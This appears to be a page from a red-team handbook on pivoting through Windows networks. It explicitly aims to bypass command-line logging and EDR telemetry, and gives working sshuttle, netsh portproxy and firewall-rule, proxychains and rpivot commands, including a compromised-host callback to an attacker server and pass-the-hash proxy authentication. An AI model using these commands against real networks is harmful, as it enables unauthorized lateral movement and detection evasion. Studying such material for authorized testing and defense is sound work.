The Red Team Vade Mecum
Search…
The Red Team Vade Mecum
The Red Team Vade Mecum
Techniques
Defense Evasion
Binary Properties and Code Signing
ATA/ATP
Tips and Tricks
Basics
Disabling/Patching Telemetry
Minimization
Commands to Avoid
Pivoting
Benefits of Using APIs
Thread-less Payload Execution
DLL Hollowing
Misdirection
Hiding our Payloads
IPC For Evasion and Control
Privilege Escalation
Enumeration
Execution
Initial Access
Lateral Movement
Code Injection
Persistence
Infrastructure
SQL
Other
Windows Internals
Powered By GitBook
Pivoting
This article will go through ways to use a windows machine as a proxy and ways to pivot through the network.
But why would we do a thing like this in the first place? Well, the pros are:
  1. 1.
    Bypass command line logging
  2. 2.
    No execution on the host, EDRs don't have telemetry over this
  3. 3.
    We touch less hosts
But the cons are:
  1. 1.
    You lose being in context of the windows user due to the fact that you don't have the privilege of windows SSO.(Need credentials)
Let's look at some ways technologies we can use to pivot.(C2 Frameworks like metasploit and cobalt strike have multiple guides on how to do so.)
Once you are in the network, you can use tools like Impacket and RPCclinet to gain info and move laterally throughout the network.

SSHuttle

This can create a VPN connection with only VPN access on the host. Note that the only requirement this needs is for python to be installed.
The below will forward all traffic.
1
sshuttle -r <USER>@<HOST> 0.0.0.0/0
Copied!

Firewalls

Windows Firewall can to proxy connections similarly to iptables redirectors.
1
netsh interface portproxy add v4tov4 listenaddress=LOCAL_ADDRESS listenport=LOCALPORT connectaddress=REMOTE_ADDRESS connectport=REMOTE_PORT protocol=tcp
2
netsh advfirewall firewall add rule name=”Evill” protocol=TCP dir=in localip=LOCAL_ADDRESS localport=LOCAL_PORT action=allow
Copied!

Proxychains for Windows

To pivot a windows operator machine into the target network, this can be used in conjunction with a socks proxy.
1
proxychains_win32_x64.exe –f <CONFIG_FILE> <CMD> <CMDARGS>
Copied!

Rpivot

This tunnels traffic into internal networks via socks4proxy in python with only the standard library. This supports NTLM proxy authentication with username or NTLM hashes:
Server (Attacker box)
1
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
Copied!
Client (Compromised box)
1
python client.py --server-ip <ip> --server-port 9443
Copied!
Through corporate proxy
1
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
2
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
Copied!
Passing the hash
1
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
2
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
3
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
Copied!

Previous
Commands to Avoid
Next
Benefits of Using APIs
Last modified 10mo ago
Copy link
Contents
SSHuttle
Firewalls
Proxychains for Windows
Rpivot